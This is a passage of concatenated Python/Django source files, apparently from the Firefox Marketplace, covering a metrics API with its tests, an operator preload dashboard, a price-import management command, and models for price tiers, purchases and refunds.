        return json.loads(value)
########NEW FILE########
__FILENAME__ = tests
import datetime
import json
import uuid
from collections import namedtuple
import mock
from nose.tools import eq_, ok_
from django.core.urlresolvers import reverse
from django.test import client
from amo.tests import TestCase
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from .models import MonolithRecord, record_stat
from .views import daterange
class RequestFactory(client.RequestFactory):
    """Test RequestFactory that fakes session, user and client metadata.

    Used to exercise get_user_hash()/record_stat() without a real request.
    """
    def __init__(self, session_key=None, user_agent=None,
                 remote_addr=None, anonymous=True, *args, **kwargs):
        class User(object):
            def is_anonymous(self):
                return anonymous
        Session = namedtuple('Session', 'session_key')
        # Random session key by default, so each factory acts as a
        # distinct "user" for hashing purposes.
        self.session = Session(session_key or str(uuid.uuid1()))
        self.user = User()
        self.META = {}
        if remote_addr:
            self.META['REMOTE_ADDR'] = remote_addr
        if user_agent:
            self.META['User-Agent'] = user_agent
        super(RequestFactory, self).__init__(*args, **kwargs)
def total_seconds(td):
    """Return the timedelta *td* expressed in seconds.

    timedelta.total_seconds() is not present in Python 2.6, so compute it
    manually from days, seconds, and microseconds.
    """
    micros = td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6
    return micros / 10 ** 6
class TestModels(TestCase):
    """Unit tests for record_stat() and the MonolithRecord model."""
    def setUp(self):
        super(TestModels, self).setUp()
        self.request = RequestFactory()
    def test_record_stat(self):
        now = datetime.datetime.utcnow()
        record_stat('app.install', self.request, value=1)
        # we should have only one record
        record = MonolithRecord.objects.get()
        eq_(record.key, 'app.install')
        eq_(record.value, json.dumps({'value': 1}))
        # The recorded timestamp defaults to (approximately) now.
        self.assertTrue(total_seconds(record.recorded - now) < 1)
    def test_record_stat_without_data(self):
        # At least one data value is required.
        with self.assertRaises(ValueError):
            record_stat('app.install', self.request)
class TestMonolithResource(RestOAuth):
    """API tests for the monolith data endpoint (stored + on-the-fly stats)."""
    fixtures = fixture('user_2519')
    def setUp(self):
        super(TestMonolithResource, self).setUp()
        self.grant_permission(self.profile, 'Monolith:API')
        self.list_url = reverse('monolith-list')
        # NOTE(review): `02` is an octal-style literal -- fine on Python 2
        # (equals 2) but a SyntaxError on Python 3; should be plain `2, 12`.
        self.now = datetime.datetime(2013, 02, 12, 17, 34)
        self.last_month = self.now - datetime.timedelta(days=30)
        self.last_week = self.now - datetime.timedelta(days=7)
        self.yesterday = self.now - datetime.timedelta(days=1)
        self.date_format = '%Y-%m-%d'
        self.request = RequestFactory()
    def test_normal_call_with_no_records(self):
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['objects'], [])
    def test_normal_call(self):
        record_stat('app.install', self.request, value=2)
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        obj = data['objects'][0]
        eq_(obj['key'], 'app.install')
        eq_(obj['value'], {'value': 2})
        # Check other fields we want to exist but ignore their value here.
        for field in ('recorded', 'user_hash'):
            assert field in obj
    def test_filter_by_date(self):
        # `end` is exclusive, `start` inclusive, matching daterange().
        for id_, date in enumerate((self.last_week, self.yesterday, self.now)):
            record_stat('app.install', self.request, __recorded=date,
                        value=id_)
        res = self.client.get(self.list_url, data={
            'end': self.now.strftime(self.date_format)})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        res = self.client.get(self.list_url, data={
            'start': self.yesterday.strftime(self.date_format),
            'end': self.now.strftime(self.date_format)})
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
    def test_filter_by_key(self):
        record_stat('apps_added_us_free', self.request, value=3)
        record_stat('apps_added_uk_free', self.request, value=1)
        # Exact match.
        res = self.client.get(self.list_url,
                              data={'key': 'apps_added_us_free'})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
    @mock.patch('mkt.monolith.views._get_query_result')
    def test_on_the_fly_query(self, _get_query):
        # Keys present in views.STATS are computed on the fly, not read
        # from MonolithRecord.
        key = 'apps_ratings'
        _get_query.return_value = [{
            'key': key,
            'recorded': datetime.date.today(),
            'user_hash': None,
            'value': {'count': 1, 'app-id': 123}}]
        res = self.client.get(self.list_url, data={'key': key})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        obj = data['objects'][0]
        eq_(obj['key'], key)
        eq_(obj['recorded'], datetime.date.today().strftime(self.date_format))
        eq_(obj['value']['count'], 1)
        eq_(obj['value']['app-id'], 123)
    def test_on_the_fly_missing_start(self):
        # On-the-fly stats require an explicit `start` parameter.
        key = 'apps_ratings'
        res = self.client.get(self.list_url, data={'key': key})
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        eq_(data['detail'], '`start` was not provided')
    @mock.patch('mkt.monolith.views._get_query_result')
    def test_on_the_fly_query_pagination(self, _get_query):
        key = 'apps_ratings'
        _get_query.return_value = [
            {'key': key, 'recorded': datetime.date.today(), 'user_hash': None,
             'value': {'count': 1, 'app-id': 123}},
            {'key': key, 'recorded': datetime.date.today(), 'user_hash': None,
             'value': {'count': 1, 'app-id': 234}},
            {'key': key, 'recorded': datetime.date.today(), 'user_hash': None,
             'value': {'count': 1, 'app-id': 345}},
        ]
        res = self.client.get(self.list_url, data={'key': key, 'limit': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        ok_(data['meta']['next'] is not None)
        ok_(data['meta']['previous'] is None)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['offset'], 0)
        eq_(data['meta']['limit'], 2)
        eq_(data['objects'][0]['value']['app-id'], 123)
        eq_(data['objects'][1]['value']['app-id'], 234)
        res = self.client.get(self.list_url, data={'key': key, 'limit': 2,
                                                   'offset': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['value']['app-id'], 345)
        ok_(data['meta']['next'] is None)
        ok_(data['meta']['previous'] is not None)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['offset'], 2)
        eq_(data['meta']['limit'], 2)
    def test_pagination(self):
        # Stored records paginate the same way as on-the-fly results.
        record_stat('app.install', self.request, value=2)
        record_stat('app.install', self.request, value=4)
        record_stat('app.install', self.request, value=6)
        res = self.client.get(self.list_url, data={'limit': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        ok_(data['meta']['next'] is not None)
        ok_(data['meta']['previous'] is None)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['offset'], 0)
        eq_(data['meta']['limit'], 2)
class TestDateRange(TestCase):
    """daterange() yields each day from start up to, but excluding, end."""
    def setUp(self):
        self.today = datetime.datetime.now().replace(microsecond=0)
        self.week_ago = self.days_ago(7)
    def test_date_range(self):
        # NOTE(review): the local `range` shadows the builtin; harmless
        # here but worth renaming.
        range = list(daterange(self.week_ago, self.today))
        eq_(len(range), 7)
        eq_(range[0], self.week_ago)
        # The end bound is exclusive.
        ok_(self.today not in range)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.monolith.views import MonolithView
urlpatterns = patterns('',
    # Read-only endpoint monolith polls to collect metrics data.
    url(r'^monolith/data/', MonolithView.as_view(), name='monolith-list'),
)
########NEW FILE########
__FILENAME__ = views
import datetime
import logging
from django.db.models import Avg, Count
from rest_framework import status
from rest_framework.exceptions import ParseError
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
import amo
from abuse.models import AbuseReport
from reviews.models import Review
from mkt.api.authentication import RestOAuthAuthentication
from mkt.api.authorization import GroupPermission
from mkt.api.base import CORSMixin, MarketplaceView
from .forms import MonolithForm
from .models import MonolithRecord
from .serializers import MonolithSerializer
log = logging.getLogger('z.monolith')
# TODO: Move the stats that can be calculated on the fly from
# apps/stats/tasks.py here.
#
# Each entry maps a metric key to:
#   'qs'        -- base queryset producing per-app aggregates,
#   'type'      -- 'slice' (per-day counts) or 'total' (cumulative to date),
#   'field_map' -- output field name -> queryset field name.
STATS = {
    'apps_ratings': {
        'qs': Review.objects
            .filter(editorreview=0, addon__type=amo.ADDON_WEBAPP)
            .values('addon')
            .annotate(count=Count('addon')),
        'type': 'slice',
        'field_map': {
            'count': 'count',
            'app-id': 'addon'},
    },
    'apps_average_rating': {
        'qs': Review.objects
            .filter(editorreview=0, addon__type=amo.ADDON_WEBAPP)
            .values('addon')
            .annotate(avg=Avg('rating')),
        'type': 'total',
        'field_map': {
            'count': 'avg',
            'app-id': 'addon'},
    },
    'apps_abuse_reports': {
        'qs': AbuseReport.objects
            .filter(addon__type=amo.ADDON_WEBAPP)
            .values('addon')
            .annotate(count=Count('addon')),
        'type': 'slice',
        'field_map': {
            'count': 'count',
            'app-id': 'addon'},
    }
}
def daterange(start, end):
    """Yield one date per whole day from *start* (inclusive) up to *end*
    (exclusive), stepping forward a day at a time."""
    one_day = datetime.timedelta(days=1)
    num_days = (end - start).days
    for offset in range(num_days):
        yield start + offset * one_day
def _get_query_result(key, start, end):
    """Compute daily values for an on-the-fly stat between start and end.

    Returns a list of record-shaped dicts (key/recorded/user_hash/value)
    so the serializer can treat them like stored MonolithRecord rows.
    Raises ParseError (-> HTTP 400) when `start` is missing.
    """
    # To do on-the-fly queries we have to produce results as if they
    # were calculated daily, which means we need to iterate over each
    # day in the range and perform an aggregation on this date.
    data = []
    today = datetime.date.today()
    stat = STATS[key]
    # Choose start and end dates that make sense if none provided.
    if not start:
        raise ParseError('`start` was not provided')
    if not end:
        end = today
    for day in daterange(start, end):
        if stat['type'] == 'total':
            # If it's a totalling queryset, we want to filter by the
            # end date until the beginning of time to get the total
            # objects up until this point in time.
            date_filtered = stat['qs'].filter(
                created__lt=(day + datetime.timedelta(days=1)))
        else:
            # Otherwise, we want to filter by both start/end to get
            # counts on a specific day.
            date_filtered = stat['qs'].filter(
                created__gte=day,
                created__lt=(day + datetime.timedelta(days=1)))
        data.extend([{
            'key': key,
            'recorded': day,
            'user_hash': None,
            'value': {'count': d.get(stat['field_map']['count']),
                      'app-id': d.get(stat['field_map']['app-id'])}}
            for d in date_filtered])
    return data
class MonolithView(CORSMixin, MarketplaceView, ListAPIView):
    """Read-only API endpoint serving metrics data to monolith."""
    cors_allowed_methods = ['get']
    permission_classes = [GroupPermission('Monolith', 'API')]
    authentication_classes = [RestOAuthAuthentication]
    serializer_class = MonolithSerializer
    def get_queryset(self):
        """Return stored records, or compute on-the-fly stats for STATS keys."""
        form = MonolithForm(self.request.QUERY_PARAMS)
        if not form.is_valid():
            # NOTE(review): returning a Response from get_queryset() is
            # unusual for DRF -- raising ParseError would be the normal way
            # to produce a 400; confirm downstream handling.
            return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
        key = form.cleaned_data['key']
        start = form.cleaned_data['start']
        end = form.cleaned_data['end']
        log.info('[Monolith] Querying key:%s [%s:%s]' % (key, start, end))
        if key in STATS:
            # Computed on the fly from live querysets, not stored records.
            return _get_query_result(key, start, end)
        else:
            # Stored records: filter by key and the [start, end) range.
            qs = MonolithRecord.objects.all()
            if key:
                qs = qs.filter(key=key)
            if start is not None:
                qs = qs.filter(recorded__gte=start)
            if end is not None:
                qs = qs.filter(recorded__lt=end)
            return qs
########NEW FILE########
__FILENAME__ = helpers
import jinja2
from jingo import register
from tower import ugettext as _, ugettext_lazy as _lazy
from mkt.developers.helpers import mkt_page_title
@register.function
@jinja2.contextfunction
def operators_page_title(context, title=None):
    """Build the page <title> for operator dashboard pages, appending the
    section name to any page-specific title."""
    section = _lazy('Operator Dashboard')
    if title:
        full_title = u'%s | %s' % (title, section)
    else:
        full_title = section
    return mkt_page_title(context, full_title)
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from amo.tests import app_factory
from mkt.developers.models import PreloadTestPlan
from mkt.operators.views import preloads
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestPreloadCandidates(amo.tests.TestCase):
    """Tests for the operator preload-candidates listing view."""
    fixtures = fixture('user_operator')
    def setUp(self):
        self.create_switch('preload-apps')
        self.url = reverse('operators.preloads')
        self.user = UserProfile.objects.get()
        self.app = app_factory()
    def test_preloads(self):
        # One public test plan should render one table row whose link
        # points at the plan's test-plan URL.
        plan = PreloadTestPlan.objects.create(addon=self.app, filename='tstpn')
        req = amo.tests.req_factory_factory(self.url, user=self.user)
        res = preloads(req)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('tbody tr').length, 1)
        eq_(doc('td:last-child a').attr('href'),
            plan.preload_test_plan_url)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
# URL routes for the operator dashboard section.
url_patterns = patterns('',
    url(r'^preloads/$', views.preloads, name='operators.preloads'),
)
########NEW FILE########
__FILENAME__ = views
from django.shortcuts import render
from waffle.decorators import waffle_switch
import amo
from amo.decorators import permission_required
from amo.utils import paginate
from mkt.developers.models import PreloadTestPlan
@permission_required('Operators', '*')
@waffle_switch('preload-apps')
def preloads(request):
    """Render a paginated list of public preload test plans.

    Restricted to users with the Operators permission and gated behind
    the 'preload-apps' waffle switch.
    """
    plans = PreloadTestPlan.objects.filter(status=amo.STATUS_PUBLIC)
    plans = plans.order_by('addon__name')
    page = paginate(request, plans, per_page=20)
    return render(request, 'operators/preloads.html', {'preloads': page})
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from mkt.prices.models import Price, PriceCurrency
# Expose the pricing models in the Django admin with default ModelAdmins.
admin.site.register(Price)
admin.site.register(PriceCurrency)
########NEW FILE########
__FILENAME__ = load_prices
from optparse import make_option
import pprint
import requests
from django.core.management.base import BaseCommand
from mkt.prices.models import Price, PriceCurrency
# Marketplace server base URLs selectable via the command-line options below.
domains = {
    'prod': 'https://marketplace.firefox.com',
    'stage': 'https://marketplace.allizom.org',
    'dev': 'https://marketplace-dev.allizom.org',
    'altpay': 'https://payments-alt.allizom.org'
}
# Public API path that serves the price tier / currency data.
endpoint = '/api/v1/webpay/prices/'
class Command(BaseCommand):
    """Management command mirroring price tiers from a marketplace server.

    Fetches the public prices API from the chosen environment (prod by
    default) and re-creates the local Price / PriceCurrency rows from it.
    """
    help = """
    Load prices and pricecurrencies from the specified marketplace.
    Defaults to prod.
    """
    option_list = BaseCommand.option_list + (
        make_option('--prod',
                    action='store_const',
                    const=domains['prod'],
                    dest='domain',
                    default=domains['prod'],
                    help='Use prod as source of data.'),
        make_option('--stage',
                    action='store_const',
                    const=domains['stage'],
                    dest='domain',
                    help='Use stage as source of data.'),
        # Fixed duplicated word ("Use use ...") in the two help strings below.
        make_option('--dev',
                    action='store_const',
                    const=domains['dev'],
                    dest='domain',
                    help='Use dev as source of data.'),
        make_option('--altpay',
                    action='store_const',
                    const=domains['altpay'],
                    dest='domain',
                    help='Use payments-alt as source of data.'),
        make_option('--delete',
                    action='store_true',
                    dest='delete',
                    default=False,
                    help='Start by deleting all prices.'),
        make_option('--noop',
                    action='store_true',
                    dest='noop',
                    default=False,
                    help=('Show data that would be added, '
                          'but do not create objects.')),
    )
    def handle(self, *args, **kw):
        """Fetch price data from the chosen server and mirror it locally."""
        data = requests.get(kw['domain'] + endpoint).json()
        if kw['delete']:
            # Wipe existing rows first so the import is a clean mirror.
            Price.objects.all().delete()
            PriceCurrency.objects.all().delete()
        if kw['noop']:
            # Dry run: print what would be created without touching the DB.
            pprint.pprint(data['objects'], indent=2)
        else:
            for p in data['objects']:
                # API tier names look like 'Tier 10'; store only the number.
                pr = Price.objects.create(name=p['name'].split(' ')[-1],
                                          active=p['active'],
                                          method=p['method'],
                                          price=p['price'])
                for pc in p['prices']:
                    pr.pricecurrency_set.create(currency=pc['currency'],
                                                carrier=pc['carrier'],
                                                price=pc['price'],
                                                paid=pc['paid'],
                                                tier=pc['tier'],
                                                dev=pc['dev'],
                                                provider=pc['provider'],
                                                method=pc['method'],
                                                region=pc['region'])
########NEW FILE########
__FILENAME__ = models
import uuid
from django.conf import settings
from django.core.cache import cache
from django.db import connection, models
from django.dispatch import receiver
from django.forms.models import model_to_dict
from django.utils import translation
import commonware.log
from babel import numbers
from cache_nuggets.lib import memoize_key
from jinja2.filters import do_dictsort
from tower import ugettext_lazy as _
import amo
from amo.models import ManagerBase, ModelBase
from amo.decorators import write
from amo.utils import get_locale_from_lang
from constants.payments import (CARRIER_CHOICES, PAYMENT_METHOD_ALL,
PAYMENT_METHOD_CHOICES, PROVIDER_BANGO,
PROVIDER_CHOICES, PROVIDER_LOOKUP)
from lib.constants import ALL_CURRENCIES
from mkt.constants import apps
from mkt.constants.regions import RESTOFWORLD, REGIONS_CHOICES_ID_DICT as RID
from mkt.regions.utils import remove_accents
from stats.models import Contribution
from users.models import UserProfile
log = commonware.log.getLogger('z.market')
def default_providers():
    """
    Returns a list of the default providers from the settings as the
    appropriate constants.
    """
    providers = []
    for provider_name in settings.PAYMENT_PROVIDERS:
        providers.append(PROVIDER_LOOKUP[provider_name])
    return providers
def price_locale(price, currency):
    """Format ``price`` in ``currency`` for the currently active locale."""
    current_lang = translation.get_language()
    locale = get_locale_from_lang(current_lang)
    formatted = numbers.format_currency(price, currency, locale=locale)
    if currency != 'EUR':
        return formatted
    # See bug 865358. EU style guide
    # (http://publications.europa.eu/code/en/en-370303.htm#position)
    # disagrees with Unicode CLDR on placement of Euro symbol.
    stripped = formatted.strip(u'\xa0\u20ac')
    if current_lang.startswith(('en', 'ga', 'lv', 'mt')):
        return u'\u20ac' + stripped
    return stripped + u'\xa0\u20ac'
def price_key(data):
    """Build the lookup-key string identifying a PriceCurrency row.

    ``data`` must supply 'carrier', 'tier', 'region' and 'provider' keys.
    """
    template = ('carrier={carrier}|tier={tier}'
                '|region={region}|provider={provider}')
    return template.format(**data)
class PriceManager(ManagerBase):
    """Manager for Price that applies the transformer and exposes active()."""
    def get_query_set(self):
        # Attach Price.transformer so PriceCurrency rows are pre-cached.
        qs = super(PriceManager, self).get_query_set()
        return qs.transform(Price.transformer)
    def active(self):
        """Return only active tiers, cheapest first."""
        return self.filter(active=True).order_by('price')
class Price(amo.models.ModelBase):
    """A price tier, e.g. 'Tier 1' at $0.99.

    Regional/currency variants live in PriceCurrency rows pointing back
    at this tier. A class-level cache (``Price._currencies``) maps
    price_key() strings to PriceCurrency objects for fast lookup.
    """
    active = models.BooleanField(default=True)
    name = models.CharField(max_length=4)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    # The payment methods available for this tier.
    method = models.IntegerField(choices=PAYMENT_METHOD_CHOICES,
                                 default=PAYMENT_METHOD_ALL)
    objects = PriceManager()
    class Meta:
        db_table = 'prices'
    def tier_name(self):
        """Return the localized display name, e.g. 'Tier 10'."""
        # L10n: %s is the name of the price tier, eg: 10.
        return _('Tier %s' % self.name)
    def tier_locale(self, currency='USD'):
        # A way to display the price of the tier.
        return price_locale(self.price, currency)
    def __unicode__(self):
        return u'$%s' % self.price
    @staticmethod
    def transformer(prices):
        # There are a constrained number of price currencies, let's just
        # get them all.
        # NOTE: the `prices` argument is unused; this populates the
        # class-level cache for every tier at once.
        Price._currencies = dict((price_key(model_to_dict(p)), p)
                                 for p in PriceCurrency.objects.all())
    def get_price_currency(self, carrier=None, region=None, provider=None):
        """
        Returns the PriceCurrency object or none.
        :param optional carrier: an int for the carrier.
        :param optional region: an int for the region. Defaults to restofworld.
        :param optional provider: an int for the provider. Defaults to bango.
        """
        region = region or RESTOFWORLD.id
        # Unless you specify a provider, we will give you the Bango tier.
        # This is probably ok for now, because Bango is the default fall back
        # however we might need to think about this for the long term.
        provider = provider or PROVIDER_BANGO
        if not hasattr(self, '_currencies'):
            # Lazily warm the cache on first use.
            Price.transformer([])
        lookup = price_key({
            'tier': self.id, 'carrier': carrier,
            'provider': provider, 'region': region
        })
        try:
            price_currency = Price._currencies[lookup]
        except KeyError:
            return None
        return price_currency
    def get_price_data(self, carrier=None, region=None, provider=None):
        """
        Returns a tuple of Decimal(price), currency, locale.
        :param optional carrier: an int for the carrier.
        :param optional region: an int for the region. Defaults to restofworld.
        :param optional provider: an int for the provider. Defaults to bango.
        """
        price_currency = self.get_price_currency(carrier=carrier,
                                                 region=region,
                                                 provider=provider)
        if price_currency:
            return price_currency.price, price_currency.currency
        # No matching PriceCurrency: caller must handle (None, None).
        return None, None
    def get_price(self, carrier=None, region=None, provider=None):
        """Return the price as a decimal for the current locale."""
        return self.get_price_data(carrier=carrier, region=region,
                                   provider=provider)[0]
    def get_price_locale(self, carrier=None, region=None, provider=None):
        """Return the price as a nicely localised string for the locale."""
        price, currency = self.get_price_data(carrier=carrier, region=region,
                                              provider=provider)
        # Implicitly returns None when no PriceCurrency matched.
        if price is not None and currency is not None:
            return price_locale(price, currency)
    def prices(self, provider=None):
        """
        A list of dicts of all the currencies and prices for this tier.
        :param int provider: A provider, using the PAYMENT_* constant.
            If not provided it will use settings.PAYMENT_PROVIDERS,
        """
        providers = [provider] if provider else default_providers()
        return [model_to_dict(o) for o in
                self.pricecurrency_set.filter(provider__in=providers)]
    def regions_by_name(self, provider=None):
        """A list of price regions sorted by name.
        :param int provider: A provider, using the PAYMENT_* constant.
            If not provided it will use settings.PAYMENT_PROVIDERS,
        """
        prices = self.prices(provider=provider)
        regions = set()
        append_rest_of_world = False
        for price in prices:
            region = RID[price['region']]
            if price['paid'] is True and region != RESTOFWORLD:
                regions.add(region)
            if price['paid'] is True and region == RESTOFWORLD:
                # Rest-of-world always sorts last, so track it separately.
                append_rest_of_world = True
        if regions:
            # Sort by name based on normalized unicode name.
            regions = sorted(regions,
                             key=lambda r: remove_accents(unicode(r.name)))
        if append_rest_of_world:
            regions.append(RESTOFWORLD)
        return regions if regions else []
    def region_ids_by_name(self, provider=None):
        """A list of price region ids sorted by name.
        :param int provider: A provider, using the PAYMENT_* constant.
            If not provided it will use settings.PAYMENT_PROVIDERS,
        """
        return [region.id for region in
                self.regions_by_name(provider=provider)]
    def provider_regions(self):
        """A dict of provider regions keyed by provider id.
        Sorted by name (except for rest of world which is
        always last).
        """
        # Avoid circular import.
        from mkt.developers.providers import get_providers
        provider_regions = {}
        providers = get_providers()
        for prv in providers:
            provider_regions[prv.provider] = self.regions_by_name(
                provider=prv.provider)
        return provider_regions
class PriceCurrency(amo.models.ModelBase):
    """A per-region/carrier/provider currency variant of a Price tier."""
    # The carrier for this currency.
    carrier = models.IntegerField(choices=CARRIER_CHOICES, blank=True,
                                  null=True)
    currency = models.CharField(max_length=10,
                                choices=do_dictsort(ALL_CURRENCIES))
    price = models.DecimalField(max_digits=10, decimal_places=2)
    # The payments provider for this tier.
    provider = models.IntegerField(choices=PROVIDER_CHOICES, blank=True,
                                   null=True)
    # The payment methods allowed for this tier.
    method = models.IntegerField(choices=PAYMENT_METHOD_CHOICES,
                                 default=PAYMENT_METHOD_ALL)
    # These are the regions as defined in mkt/constants/regions.
    region = models.IntegerField(default=1)  # Default to restofworld.
    tier = models.ForeignKey(Price)
    # If this should show up in the developer hub.
    dev = models.BooleanField(default=True)
    # If this can currently accept payments from users.
    paid = models.BooleanField(default=True)
    class Meta:
        db_table = 'price_currency'
        verbose_name = 'Price currencies'
        # One row per (tier, currency, carrier, region, provider) combo;
        # mirrors the price_key() lookup used by Price._currencies.
        unique_together = ('tier', 'currency', 'carrier', 'region',
                           'provider')
    def __unicode__(self):
        return u'%s, %s: %s' % (self.tier, self.currency, self.price)
@receiver(models.signals.post_save, sender=PriceCurrency,
          dispatch_uid='save_price_currency')
@receiver(models.signals.post_delete, sender=PriceCurrency,
          dispatch_uid='delete_price_currency')
def update_price_currency(sender, instance, **kw):
    """
    Ensure that when PriceCurrencies are updated, all the apps that use them
    are re-indexed into ES so that the region information will be correct.
    """
    if kw.get('raw'):
        # Skip during fixture loading.
        return
    try:
        ids = list(instance.tier.addonpremium_set
                           .values_list('addon_id', flat=True))
    except Price.DoesNotExist:
        # The parent tier is already gone (e.g. cascading delete).
        return
    if ids:
        log.info('Indexing {0} add-ons due to PriceCurrency changes'
                 .format(len(ids)))
        # Circular import sad face.
        from mkt.webapps.tasks import index_webapps
        index_webapps.delay(ids)
class AddonPurchase(amo.models.ModelBase):
    """Records a user's purchase (or refund/chargeback) state for an add-on."""
    addon = models.ForeignKey('addons.Addon')
    # Latest contribution type; flips between purchase/refund/chargeback
    # as events arrive (see create_addon_purchase below).
    type = models.PositiveIntegerField(default=amo.CONTRIB_PURCHASE,
                                       choices=do_dictsort(amo.CONTRIB_TYPES),
                                       db_index=True)
    user = models.ForeignKey(UserProfile)
    # Filled in post-save by add_uuid: '<pk>-<uuid4>'.
    uuid = models.CharField(max_length=255, db_index=True, unique=True)
    class Meta:
        db_table = 'addon_purchase'
        unique_together = ('addon', 'user')
    def __unicode__(self):
        return u'%s: %s' % (self.addon, self.user)
@receiver(models.signals.post_save, sender=AddonPurchase)
def add_uuid(sender, **kw):
    """Post-save hook: assign a unique '<pk>-<uuid4>' to new purchases."""
    if not kw.get('raw'):
        record = kw['instance']
        if not record.uuid:
            # Needs the pk, so this can only run after the initial save;
            # the second save() below will re-enter this handler but the
            # uuid check makes it a no-op.
            record.uuid = '{pk}-{u}'.format(pk=record.pk, u=str(uuid.uuid4()))
            record.save()
@write
@receiver(models.signals.post_save, sender=Contribution,
          dispatch_uid='create_addon_purchase')
def create_addon_purchase(sender, instance, **kw):
    """
    When the contribution table is updated with the data from PayPal,
    update the addon purchase table. Will figure out if we need to add to or
    delete from the AddonPurchase table.
    """
    if (kw.get('raw') or
        instance.type not in [amo.CONTRIB_PURCHASE, amo.CONTRIB_REFUND,
                              amo.CONTRIB_CHARGEBACK]):
        # Whitelist the types we care about. Forget about the rest.
        return
    log.debug('Processing addon purchase type: %s, addon %s, user %s'
              % (unicode(amo.CONTRIB_TYPES[instance.type]),
                 instance.addon.pk, instance.user.pk))
    if instance.type == amo.CONTRIB_PURCHASE:
        log.debug('Creating addon purchase: addon %s, user %s'
                  % (instance.addon.pk, instance.user.pk))
        data = {'addon': instance.addon, 'user': instance.user}
        # get_or_create so a re-purchase after a refund reuses the row;
        # the update() flips its type back to purchase.
        purchase, created = AddonPurchase.objects.safer_get_or_create(**data)
        purchase.update(type=amo.CONTRIB_PURCHASE)
        from mkt.webapps.models import Installed  # Circular import
        # Ensure that devs have the correct installed object found
        # or created.
        #
        is_dev = instance.addon.has_author(instance.user,
                 (amo.AUTHOR_ROLE_OWNER, amo.AUTHOR_ROLE_DEV))
        install_type = (apps.INSTALL_TYPE_DEVELOPER if is_dev
                        else apps.INSTALL_TYPE_USER)
        Installed.objects.safer_get_or_create(user=instance.user,
            addon=instance.addon, install_type=install_type)
    elif instance.type in [amo.CONTRIB_REFUND, amo.CONTRIB_CHARGEBACK]:
        # Mark any existing purchase rows with the refund/chargeback type
        # (they are not deleted, just retyped).
        purchases = AddonPurchase.objects.filter(addon=instance.addon,
                                                 user=instance.user)
        for p in purchases:
            log.debug('Changing addon purchase: %s, addon %s, user %s'
                      % (p.pk, instance.addon.pk, instance.user.pk))
            p.update(type=instance.type)
    # Invalidate the cached purchase-id list for this user either way.
    cache.delete(memoize_key('users:purchase-ids', instance.user.pk))
class AddonPremium(amo.models.ModelBase):
    """Additions to the Addon model that only apply to Premium add-ons."""
    addon = models.OneToOneField('addons.Addon')
    price = models.ForeignKey(Price, blank=True, null=True)
    class Meta:
        db_table = 'addons_premium'
    def __unicode__(self):
        return u'Premium %s: %s' % (self.addon, self.price)
    def is_complete(self):
        """True when addon, tier, PayPal id and support email are all set."""
        return bool(self.addon and self.price and
                    self.addon.paypal_id and self.addon.support_email)
class RefundManager(ManagerBase):
    """Manager exposing per-addon Refund queries filtered by status."""
    def by_addon(self, addon):
        return self.filter(contribution__addon=addon)
    def pending(self, addon=None):
        # NOTE(review): addon defaults to None here, unlike the sibling
        # methods -- passing None filters on contribution__addon=None.
        return self.by_addon(addon).filter(status=amo.REFUND_PENDING)
    def approved(self, addon):
        return self.by_addon(addon).filter(status=amo.REFUND_APPROVED)
    def instant(self, addon):
        return self.by_addon(addon).filter(status=amo.REFUND_APPROVED_INSTANT)
    def declined(self, addon):
        return self.by_addon(addon).filter(status=amo.REFUND_DECLINED)
    def failed(self, addon):
        return self.by_addon(addon).filter(status=amo.REFUND_FAILED)
class Refund(ModelBase):
    """A refund request attached to a purchase Contribution."""
    # This refers to the original object with `type=amo.CONTRIB_PURCHASE`.
    contribution = models.OneToOneField('stats.Contribution')
    # Pending => 0
    # Approved => 1
    # Instantly Approved => 2
    # Declined => 3
    # Failed => 4
    status = models.PositiveIntegerField(default=amo.REFUND_PENDING,
        choices=do_dictsort(amo.REFUND_STATUSES), db_index=True)
    refund_reason = models.TextField(default='', blank=True)
    rejection_reason = models.TextField(default='', blank=True)
    # Date `created` should always be date `requested` for pending refunds,
    # but let's just stay on the safe side. We might change our minds.
    requested = models.DateTimeField(null=True, db_index=True)
    approved = models.DateTimeField(null=True, db_index=True)
    declined = models.DateTimeField(null=True, db_index=True)
    user = models.ForeignKey('users.UserProfile')
    objects = RefundManager()
    class Meta:
        db_table = 'refunds'
    def __unicode__(self):
        return u'%s (%s)' % (self.contribution, self.get_status_display())
    @staticmethod
    def post_save(sender, instance, **kwargs):
        # Any refund change may push the add-on over the escalation
        # threshold; re-check asynchronously.
        from amo.tasks import find_refund_escalations
        find_refund_escalations(instance.contribution.addon_id)
    @classmethod
    def recent_refund_ratio(cls, addon_id, since):
        """
        Returns the ratio of purchases to refunds since the given datetime.
        """
        cursor = connection.cursor()
        purchases = AddonPurchase.objects.filter(
            addon=addon_id, type=amo.CONTRIB_PURCHASE).count()
        if purchases == 0:
            # Avoid division by zero when nothing was ever purchased.
            return 0.0
